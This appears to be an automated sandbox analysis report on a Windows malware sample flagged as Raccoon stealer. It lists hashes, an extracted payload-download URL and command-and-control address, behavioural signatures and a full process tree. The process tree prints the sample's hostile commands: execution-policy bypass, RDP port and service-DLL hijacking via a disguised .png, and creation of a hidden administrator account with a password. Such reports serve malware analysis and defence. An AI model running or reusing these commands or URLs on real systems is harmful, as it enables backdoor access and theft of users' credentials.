Analysis
-
max time kernel
88s -
max time network
110s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
03-06-2021 00:02
Static task
static1
Behavioral task
behavioral1
Sample
42cedc39e8da5fcd0b294e84aa406006.exe
Resource
win7v20210408
Behavioral task
behavioral2
Sample
42cedc39e8da5fcd0b294e84aa406006.exe
Resource
win10v20210410
General
-
Target
42cedc39e8da5fcd0b294e84aa406006.exe
-
Size
569KB
-
MD5
42cedc39e8da5fcd0b294e84aa406006
-
SHA1
b0e221a7ba816e9d51724af40b551d72b395d62b
-
SHA256
7672dfbaa089b5f55f22e1bf1f9f985e65cc9166455c83637d3219c2c9eb4dff
-
SHA512
349415ec56ea0b294beb98b3b5aecf7ad3a02e1024563bfdc4c08cfca1950f88224c3d8456e8e21720917705ef11ea9b8a64e8a4cacc4c5fd2f93a15ccdd35f3
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Extracted
raccoon
e46634757936706c1ff491585768dd6fe231db30
-
url4cnc
https://tttttt.me/jdiamond13
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 9 IoCs
Processes:
powershell.exeflow pid process 19 1772 powershell.exe 21 1772 powershell.exe 22 1772 powershell.exe 23 1772 powershell.exe 25 1772 powershell.exe 27 1772 powershell.exe 29 1772 powershell.exe 31 1772 powershell.exe 33 1772 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
Processes:
gYmsQZhOxV.exepid process 4092 gYmsQZhOxV.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule \Windows\Branding\mediasrv.png upx \Windows\Branding\mediasvc.png upx -
Loads dropped DLL 8 IoCs
Processes:
42cedc39e8da5fcd0b294e84aa406006.exepid process 3952 42cedc39e8da5fcd0b294e84aa406006.exe 3952 42cedc39e8da5fcd0b294e84aa406006.exe 3952 42cedc39e8da5fcd0b294e84aa406006.exe 3952 42cedc39e8da5fcd0b294e84aa406006.exe 3952 42cedc39e8da5fcd0b294e84aa406006.exe 3952 42cedc39e8da5fcd0b294e84aa406006.exe 3464 3464 -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops file in Program Files directory 4 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI powershell.exe -
Drops file in Windows directory 19 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\branding\ShellBrd powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_kucrxs3x.jtu.psm1 powershell.exe File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI95DD.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI960D.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI963E.tmp powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_nxjxex3u.ixm.ps1 powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI961D.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI966D.tmp powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 3956 timeout.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exeWMIC.exedescription ioc process Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "Computer [Protected Mode]" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\CurrentLevel = "69632" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Icon = "shell32.dll#0018" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\PMDisplayName = "Restricted sites [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\SelfHealCount = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\DisplayName = "Trusted sites" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\CurrentLevel = "73728" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Icon = "inetcpl.cpl#00004480" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\CurrentLevel = "66816" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Icon = "inetcpl.cpl#00004480" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1400 = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet." powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ftp = "3" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\DisplayName = "Local intranet" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1400 = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1400 = "1" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyByPass = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\e1be3f182420a0a0 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c000000 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\LowIcon = "inetcpl.cpl#005422" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\file = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\LowIcon = "inetcpl.cpl#005423" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\CurrentLevel = "70912" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\PMDisplayName = "Internet [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\LowIcon = "inetcpl.cpl#005426" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data." powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\PMDisplayName = "Internet [Protected Mode]" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Flags = "33" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "My Computer [Protected Mode]" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\LowIcon = "inetcpl.cpl#005424" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "Computer [Protected Mode]" powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\2ba02e083fadee33 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c004900450035005f00550041005f004200610063006b00750070005f0046006c00610067002c0000000100080035002e0030000000000000000000 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\CurrentLevel = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\knownfolder = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\CurrentLevel = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\CurrentLevel = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Icon = "inetcpl.cpl#001313" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\ powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 21 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 23 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 18 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 3808 powershell.exe 3808 powershell.exe 3808 powershell.exe 3148 powershell.exe 3148 powershell.exe 3148 powershell.exe 2248 powershell.exe 2248 powershell.exe 2248 powershell.exe 2004 powershell.exe 2004 powershell.exe 2004 powershell.exe 3808 powershell.exe 3808 powershell.exe 3808 powershell.exe 1772 powershell.exe 1772 powershell.exe 1772 powershell.exe -
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid process 612 612 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 3808 powershell.exe Token: SeDebugPrivilege 3148 powershell.exe Token: SeIncreaseQuotaPrivilege 3148 powershell.exe Token: SeSecurityPrivilege 3148 powershell.exe Token: SeTakeOwnershipPrivilege 3148 powershell.exe Token: SeLoadDriverPrivilege 3148 powershell.exe Token: SeSystemProfilePrivilege 3148 powershell.exe Token: SeSystemtimePrivilege 3148 powershell.exe Token: SeProfSingleProcessPrivilege 3148 powershell.exe Token: SeIncBasePriorityPrivilege 3148 powershell.exe Token: SeCreatePagefilePrivilege 3148 powershell.exe Token: SeBackupPrivilege 3148 powershell.exe Token: SeRestorePrivilege 3148 powershell.exe Token: SeShutdownPrivilege 3148 powershell.exe Token: SeDebugPrivilege 3148 powershell.exe Token: SeSystemEnvironmentPrivilege 3148 powershell.exe Token: SeRemoteShutdownPrivilege 3148 powershell.exe Token: SeUndockPrivilege 3148 powershell.exe Token: SeManageVolumePrivilege 3148 powershell.exe Token: 33 3148 powershell.exe Token: 34 3148 powershell.exe Token: 35 3148 powershell.exe Token: 36 3148 powershell.exe Token: SeDebugPrivilege 2248 powershell.exe Token: SeIncreaseQuotaPrivilege 2248 powershell.exe Token: SeSecurityPrivilege 2248 powershell.exe Token: SeTakeOwnershipPrivilege 2248 powershell.exe Token: SeLoadDriverPrivilege 2248 powershell.exe Token: SeSystemProfilePrivilege 2248 powershell.exe Token: SeSystemtimePrivilege 2248 powershell.exe Token: SeProfSingleProcessPrivilege 2248 powershell.exe Token: SeIncBasePriorityPrivilege 2248 powershell.exe Token: SeCreatePagefilePrivilege 2248 powershell.exe Token: SeBackupPrivilege 2248 powershell.exe Token: SeRestorePrivilege 2248 powershell.exe Token: SeShutdownPrivilege 2248 powershell.exe Token: SeDebugPrivilege 2248 powershell.exe Token: SeSystemEnvironmentPrivilege 2248 powershell.exe Token: SeRemoteShutdownPrivilege 2248 powershell.exe Token: SeUndockPrivilege 2248 powershell.exe Token: SeManageVolumePrivilege 2248 powershell.exe Token: 33 2248 powershell.exe Token: 34 2248 powershell.exe Token: 35 2248 powershell.exe Token: 36 2248 powershell.exe Token: SeDebugPrivilege 2004 powershell.exe Token: SeIncreaseQuotaPrivilege 2004 powershell.exe Token: SeSecurityPrivilege 2004 powershell.exe Token: SeTakeOwnershipPrivilege 2004 powershell.exe Token: SeLoadDriverPrivilege 2004 powershell.exe Token: SeSystemProfilePrivilege 2004 powershell.exe Token: SeSystemtimePrivilege 2004 powershell.exe Token: SeProfSingleProcessPrivilege 2004 powershell.exe Token: SeIncBasePriorityPrivilege 2004 powershell.exe Token: SeCreatePagefilePrivilege 2004 powershell.exe Token: SeBackupPrivilege 2004 powershell.exe Token: SeRestorePrivilege 2004 powershell.exe Token: SeShutdownPrivilege 2004 powershell.exe Token: SeDebugPrivilege 2004 powershell.exe Token: SeSystemEnvironmentPrivilege 2004 powershell.exe Token: SeRemoteShutdownPrivilege 2004 powershell.exe Token: SeUndockPrivilege 2004 powershell.exe Token: SeManageVolumePrivilege 2004 powershell.exe Token: 33 2004 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
42cedc39e8da5fcd0b294e84aa406006.execmd.exegYmsQZhOxV.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exedescription pid process target process PID 3952 wrote to memory of 4092 3952 42cedc39e8da5fcd0b294e84aa406006.exe gYmsQZhOxV.exe PID 3952 wrote to memory of 4092 3952 42cedc39e8da5fcd0b294e84aa406006.exe gYmsQZhOxV.exe PID 3952 wrote to memory of 2720 3952 42cedc39e8da5fcd0b294e84aa406006.exe cmd.exe PID 3952 wrote to memory of 2720 3952 42cedc39e8da5fcd0b294e84aa406006.exe cmd.exe PID 3952 wrote to memory of 2720 3952 42cedc39e8da5fcd0b294e84aa406006.exe cmd.exe PID 2720 wrote to memory of 3956 2720 cmd.exe timeout.exe PID 2720 wrote to memory of 3956 2720 cmd.exe timeout.exe PID 2720 wrote to memory of 3956 2720 cmd.exe timeout.exe PID 4092 wrote to memory of 3808 4092 gYmsQZhOxV.exe powershell.exe PID 4092 wrote to memory of 3808 4092 gYmsQZhOxV.exe powershell.exe PID 3808 wrote to memory of 3508 3808 powershell.exe csc.exe PID 3808 wrote to memory of 3508 3808 powershell.exe csc.exe PID 3508 wrote to memory of 1648 3508 csc.exe cvtres.exe PID 3508 wrote to memory of 1648 3508 csc.exe cvtres.exe PID 3808 wrote to memory of 3148 3808 powershell.exe powershell.exe PID 3808 wrote to memory of 3148 3808 powershell.exe powershell.exe PID 3808 wrote to memory of 2248 3808 powershell.exe powershell.exe PID 3808 wrote to memory of 2248 3808 powershell.exe powershell.exe PID 3808 wrote to memory of 2004 3808 powershell.exe powershell.exe PID 3808 wrote to memory of 2004 3808 powershell.exe powershell.exe PID 3808 wrote to memory of 3260 3808 powershell.exe reg.exe PID 3808 wrote to memory of 3260 3808 powershell.exe reg.exe PID 3808 wrote to memory of 1772 3808 powershell.exe reg.exe PID 3808 wrote to memory of 1772 3808 powershell.exe reg.exe PID 3808 wrote to memory of 3144 3808 powershell.exe reg.exe PID 3808 wrote to memory of 3144 3808 powershell.exe reg.exe PID 3808 wrote to memory of 2164 3808 powershell.exe net.exe PID 3808 wrote to memory of 2164 3808 powershell.exe net.exe PID 2164 wrote to memory of 1240 2164 net.exe net1.exe PID 2164 wrote to memory of 1240 2164 net.exe net1.exe PID 3808 wrote to memory of 2740 3808 powershell.exe cmd.exe PID 3808 wrote to memory of 2740 3808 powershell.exe cmd.exe PID 2740 wrote to memory of 3208 2740 cmd.exe cmd.exe PID 2740 wrote to memory of 3208 2740 cmd.exe cmd.exe PID 3208 wrote to memory of 3848 3208 cmd.exe net.exe PID 3208 wrote to memory of 3848 3208 cmd.exe net.exe PID 3848 wrote to memory of 1128 3848 net.exe net1.exe PID 3848 wrote to memory of 1128 3848 net.exe net1.exe PID 3808 wrote to memory of 2196 3808 powershell.exe cmd.exe PID 3808 wrote to memory of 2196 3808 powershell.exe cmd.exe PID 2196 wrote to memory of 2828 2196 cmd.exe cmd.exe PID 2196 wrote to memory of 2828 2196 cmd.exe cmd.exe PID 2828 wrote to memory of 932 2828 cmd.exe net.exe PID 2828 wrote to memory of 932 2828 cmd.exe net.exe PID 932 wrote to memory of 2124 932 net.exe net1.exe PID 932 wrote to memory of 2124 932 net.exe net1.exe PID 3972 wrote to memory of 2248 3972 cmd.exe net.exe PID 3972 wrote to memory of 2248 3972 cmd.exe net.exe PID 2248 wrote to memory of 2928 2248 net.exe net1.exe PID 2248 wrote to memory of 2928 2248 net.exe net1.exe PID 3992 wrote to memory of 1812 3992 cmd.exe net.exe PID 3992 wrote to memory of 1812 3992 cmd.exe net.exe PID 1812 wrote to memory of 1564 1812 net.exe net1.exe PID 1812 wrote to memory of 1564 1812 net.exe net1.exe PID 3692 wrote to memory of 3956 3692 cmd.exe net.exe PID 3692 wrote to memory of 3956 3692 cmd.exe net.exe PID 3956 wrote to memory of 2740 3956 net.exe net1.exe PID 3956 wrote to memory of 2740 3956 net.exe net1.exe PID 1240 wrote to memory of 1832 1240 cmd.exe net.exe PID 1240 wrote to memory of 1832 1240 cmd.exe net.exe PID 1832 wrote to memory of 1464 1832 net.exe net1.exe PID 1832 wrote to memory of 1464 1832 net.exe net1.exe PID 2088 wrote to memory of 2352 2088 cmd.exe net.exe PID 2088 wrote to memory of 2352 2088 cmd.exe net.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\42cedc39e8da5fcd0b294e84aa406006.exe"C:\Users\Admin\AppData\Local\Temp\42cedc39e8da5fcd0b294e84aa406006.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\gYmsQZhOxV.exe"C:\Users\Admin\AppData\Local\Temp\gYmsQZhOxV.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'3⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\amutdoir\amutdoir.cmdline"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5C2F.tmp" "c:\Users\Admin\AppData\Local\Temp\amutdoir\CSC4AE3CED5DC0C4D95A76C66B041D5143E.TMP"5⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f4⤵
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f4⤵
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add5⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start rdpdr5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start rdpdr6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr7⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start TermService5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start TermService6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService7⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f4⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\42cedc39e8da5fcd0b294e84aa406006.exe"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK3⤵
- Delays execution with timeout.exe
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc Ghar4f5 /del1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user wgautilacc Ghar4f5 /del2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc Ghar4f5 /del3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc YY6epZcX /add1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user wgautilacc YY6epZcX /add2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc YY6epZcX /add3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD1⤵
- Suspicious use of WriteProcessMemory
-
